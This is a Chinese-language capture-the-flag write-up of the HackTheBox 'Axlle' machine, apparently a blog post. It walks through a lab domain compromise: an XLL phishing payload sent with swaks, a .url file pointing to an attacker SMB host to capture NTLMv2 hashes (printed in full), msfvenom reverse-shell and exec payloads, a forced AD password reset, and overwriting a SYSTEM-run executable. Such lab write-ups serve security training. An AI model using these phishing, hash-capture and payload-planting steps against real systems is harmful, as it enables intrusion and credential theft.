【season-5】 htb Axlle wp

User

nmap

└─$ sudo nmap -sU 10.129.29.242 --top-ports=200 --min-rate=3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-22 22:08 EDT
Nmap scan report for 10.129.29.242 (10.129.29.242)
Host is up (0.50s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

####

PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-23 02:09:51Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name) (X)
445/tcp   open  microsoft-ds? (X)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
50741/tcp open  msrpc         Microsoft Windows RPC
56294/tcp open  msrpc         Microsoft Windows RPC
56309/tcp open  msrpc         Microsoft Windows RPC
62593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
62594/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MAINFRAME; OS: Windows; CPE: cpe:/o:microsoft:windows

ldap看了下域名

ldapsearch

serverName: CN=MAINFRAME,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Con
 figuration,DC=axlle,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=axlle,DC=htb
namingContexts: CN=Configuration,DC=axlle,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=axlle,DC=htb
namingContexts: DC=DomainDnsZones,DC=axlle,DC=htb
namingContexts: DC=ForestDnsZones,DC=axlle,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 156257
dsServiceName: CN=NTDS Settings,CN=MAINFRAME,CN=Servers,CN=Default-First-Site-
 Name,CN=Sites,CN=Configuration,DC=axlle,DC=htb
dnsHostName: MAINFRAME.axlle.htb
defaultNamingContext: DC=axlle,DC=htb
currentTime: 20240623021359.0Z
configurationNamingContext: CN=Configuration,DC=axlle,DC=htb

smb没有匿名的可以看
所以入口大概率是web部分

http

dns爆出来一个mainframe.axlle.htb.

dir没有爆破出什么有用的路径.

这个web翻过了，就上面的文字有些线索。

他说自己邮箱只接受execl格式的文件。

If you have any outstanding invoices or requests, please email them to accounts@axlle.htb in Excel format. Please note that all macros are disabled due to our security posture.

但同时不能用宏，根据这个线索可以联想到xls的xll以及doc的dde之类钓鱼。

https://threatresearch.ext.hp.com/how-attackers-use-xll-malware-to-infect-systems/

所以找个xll的项目，这个xll本身其实就是个dll，不过execl可以直接运行，这里很符合他的宏禁用情况下同时还是execl执行的限制。

Attackers usually place their code in the xlAutoOpen function, which is executed immediately when the add-in is activated. What makes this technique dangerous is that only one click is required to run the malware, unlike VBA macros which require the user to disable Microsoft Office’s Protected View and enable macro content. However, XLL files are portable executables that follow the format of dynamic link libraries (DLLs) which many email gateways already block.

文章中也有指出xlAutoOpen这个函数是利用的重点之一。

https://learn.microsoft.com/en-us/office/client-developer/excel/xlautoopen

可以看一下官方对其的介绍

# Remarks
Microsoft Excel calls xlAutoOpen whenever the XLL is activated. The XLL is activated in the following situations:

At the start of an Excel session if it was active in the last Excel session that ended normally.

If loaded during an Excel session.

An XLL can be loaded in several ways:

By choosing Open on the File menu (where the version of Excel supports this method of loading XLLs).

Using the Add-In Manager.

From another XLL that calls xlfRegister with the name of this DLL as the only argument.

From an XLM macro sheet that calls REGISTER with the name of this DLL as the only argument.

If the add-in is deactivated and reactivated during an Excel session, this function is called on reactivation.

简单来说这个函数在打开时会被调用，也就是说其作为一个dll文件中的函数会被在一开始就调用。

所以我们这里其实有两种思路来实现RCE，一个是利用上面他说的xlAutoOpen接口来做，另一个是利用其本身dll的特性，在加载时候就执行即可。

这里我用的项目是

https://github.com/moohax/xllpoc

我把执行丢在了dll执行时候.

这样编译会报错

错误	C4716	“xlAutoOpen”: 必须返回一个值	XLL_POC	

然后回头给XLL_POC.cpp return一个值就ok

然后编译完了就用swaks

swaks --to accounts@axlle.htb  --from test@axlle.htb --header "Subject: testt" --body "testt" --server axlle.htb --attach @poc.xll

丢过去就ok。

等一会就会收到axlle\gideon.hamill用户的shell

gideon.hamill -> dallon.matrix

进来之后收集了一下用户名，考虑到可能之后会有撞的时候。

Administrator
baz.humphries
brad.shaw
calum.scott
dallon.matrix
dan.kendo
gideon.hamill
jacob.greeny
lindsay.richards
Public
simon.smalls
trent.langdon

然后这个用户家目录下其实没啥东西，但是考虑到他本身有hmailserver，所以找了一下服务目录。

在其中找到了一个hMailServer.INI包含了一部分用户密码，不过是加密过的。

PS C:\Program Files (x86)\hMailServer\Bin> cat hMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=52a1b2a1211e690998e0d2ccb653ff22
[Database]
Type=MSSQLCE
Username=
Password=52abe4d2e16269ddddf7b166218e92d9
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

然后翻了翻邮件发现其中包含了一个邮件

PS C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2f> cat "{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml"
Return-Path: webdevs@axlle.htb
Received: from bumbag (Unknown [192.168.77.153])
        by MAINFRAME with ESMTP
        ; Mon, 1 Jan 2024 06:32:24 -0800
Date: Tue, 02 Jan 2024 01:32:23 +1100
To: dallon.matrix@axlle.htb,calum.scott@axlle.htb,trent.langdon@axlle.htb,dan.kendo@axlle.htb,david.brice@axlle.htb,frankie.rose@axlle.htb,samantha.fade@axlle.htb,jess.adams@axlle.htb,emily.cook@axlle.htb,phoebe.graham@axlle.htb,matt.drew@axlle.htb,xavier.edmund@axlle.htb,baz.humphries@axlle.htb,jacob.greeny@axlle.htb
From: webdevs@axlle.htb
Subject: OSINT Application Testing
Message-Id: <20240102013223.019081@bumbag>
X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/

Hi everyone,

The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.

We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.

Yours in click-worthy URLs,

The Web Dev Team

这里内容是他们搞了个自动点击的应用，会自动点击C:\inetpub\testing下的web shortcuts（需要注意web shortcuts不是指lnk，这里是指向url的.url文件）.

然后这楼里邮件里的用户名也简单拿了一下可能会有用。

dallon.matrix
calum.scott
trent.langdon
dan.kendo
david.brice
frankie.rose
samantha.fade
jess.adams
emily.cook
phoebe.graham
matt.drew
xavier.edmund
baz.humphries
jacob.greeny
webdevs

所以现在手头可以做的有两件事：

• 1.解密hmailserver.ini中的密码。
• 2.从他的自动化点击上做点啥，比如smb拿hash或者别的玩法。

首先是解密，这里我用了两个项目，因为我怀疑解密出来的东西不对..最后又改了一下他本地发现的一个密码解密文件，后来发现这是个兔子洞，密码都没用上。

https://github.com/mvdnes/hm_decrypt
https://github.com/GitMirar/hMailDatabasePasswordDecrypter

└─$ ./decrypt 52abe4d2e16269ddddf7b166218e92d9
4A02D41C55AC 

这个是MSSQLCE的密码，administator的是一串乱码。

不过还是拿着mssqlce的密码去撞了一下上面收集到的用户，然后并没有出货。

所以选择尝试第二条路写个.url丢去C:\inetpub\testing投毒拿htlmhash啥的。

文件格式可以这么写，我一开始尝试了smb:\\它不支持，file://行。

[InternetShortcut]
URL=file://10.10.xx.xx/

或者直接用powershell也可以

$filePath = "\\10.10.16.x\"
$shortcutPath = "./test.url"
$shell = New-Object -ComObject WScript.Shell
$shortcut = $shell.CreateShortcut($shortcutPath)
$shortcut.TargetPath = $filePath
$shortcut.Save()

我也试过这个

https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication#execution-via-.url

icon的不知道为啥没反应，怪怪的。

然后本地responder等他点击就收到了hash

[SMB] NTLMv2-SSP Client   : 10.129.29.242                                                                                                   [SMB] NTLMv2-SSP Username : AXLLE\dallon.matrix                                      [SMB] NTLMv2-SSP Hash     : dallon.matrix::AXLLE:0679f365f951f30c:2978E5AD3222E13C491CE58EBBBDD1CA:01010000000000008023DF270EC5DA01665A5A85E990C5E60000000002000800500056003300580001001E00570049004E002D003500520057003900480046004E00490030004300360004003400570049004E002D003500520057003900480046004E0049003000430036002E0050005600330058002E004C004F00430041004C000300140050005600330058002E004C004F00430041004C000500140050005600330058002E004C004F00430041004C00070008008023DF270EC5DA0106000400020000000800300030000000000000000100000000200000AEEE4334555C9C00725FBA4B8
7A9DD5C13B1E6F443716644AE6757FBDA1DA3800A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002
E0033000000000000000000              
                                 
[SMB] NTLMv2-SSP Client   : 10.129.29.242                                                                                                   [SMB] NTLMv2-SSP Username : AXLLE\Administrator                                                                                             [SMB] NTLMv2-SSP Hash     : Administrator::AXLLE:11de9e88fb716584:6EF51DAF63AF2CEB92C6E9D0F71B37A7:01010000000000008023DF270EC5DA01967365F766DDC2090000000002000800500056003300580001001E00570049004E002D003500520057003900480046004E00490030004300360004003400570049004E002D003500520057003900480046004E0049003000430036002E0050005600330058002E004C004F00430041004C000300140050005600330058002E004C004F00430041004C000500140050005
600330058002E004C004F00430041004C00070008008023DF270EC5DA0106000400020000000800300030000000000000000000000000300000AEEE4334555C9C00725FBA4B8
7A9DD5C13B1E6F443716644AE6757FBDA1DA3800A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002
E0033000000000000000000

神奇的是居然还有admin的hash出现..不过这两个hash都跑不出密码.

然后这边卡了一段时间，之后思考了一下重新看了一下mail的内容，他这句有点让我产生了一些想法Yours in click-worthy URLs，也就是说他会把我的.url添加到网站后可能会有人去点击，那如果我给他一个逆天exe或者别的马子啥的，他也会点击然后执行吗。

所以用msfvemon生成了一个exe(奇怪的是正常的我生成执行有回连，但是执行没反应，所以最后用的exec来执行的命令).

监听一会之后就得到了DALLON.MATRIX@AXLLE.HTB用户的回连shell.

DALLON.MATRIX@AXLLE.HTB -> APP DEVS

溜了下狗

看到DALLON.MATRIX用户所属的WEB DEVS组对APP DEVS组的两个用户有强制修改密码的权限。

所以选一个APP DEVS的倒霉蛋改一下密码。

Set-DomainUserPassword -Identity "JACOB.GREENY" -Verbose

因为这俩用户都在remote management users组里，直接winrm直接登录就ok

APP DEVS -> root

这里看了下狗到这里就没啥线索了。

所以考虑应该是别的途径继续提权，然后就想起来一开始刚拿到第一个用户的shell时，翻目录时候再c:/下有一个App Development的目录，最初的用户ls看没有回显，考虑到可能是没有权限所以就搁置了。

因为这个用户所在的组叫做appdev所以返回去看了下这个应用目录，果然是可以访问了。

然后在目录中翻到了一个readme

*Evil-WinRM* PS C:\App Development\kbfiltr> cat README.md
# Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

## Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

## Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

## Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

## Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

## Usage
### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

## Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

## Bugs
There are probably several.

总的来说就是他们有一个在开发中的应用，不过我比较关注这几个部分

...
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

安装他的这个应用开发环境需要以admin权限，不过我看他已经装好了，所以这个留作备选。

其次是他写了个自动运行的东西用admin权限执行C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe来自动测试和debug这个驱动，

所以这里我先去他这个应用目录下考虑尝试对他standalonerunner.exe看看有没有写入权限

直接一个echo 1 > standalonerunner.exe.

然后就发现确实是有写入权限，内容变了。

他目录下还有一个standalonerunner.dll不过我懒得去看他被调用了啥函数..既然有exe的写入权限就优先尝试替换.exe.

因为msfvemon我那个正常的有问题，所以这里还是用的msfvenom -a x64 --platform Windows -p windows/exec CMD="powershell ..." -f exe > standalonerunner.exe

然后等了一会发现文件被清了..可能是有脚本在重置目录，所以又传上去了一次，等了一会get root

---

如果您喜欢我的文章，可以关注我喜欢的vsinger(XD

https://www.youtube.com/channel/UCBLGjbYv6-xxju1i44RjnnA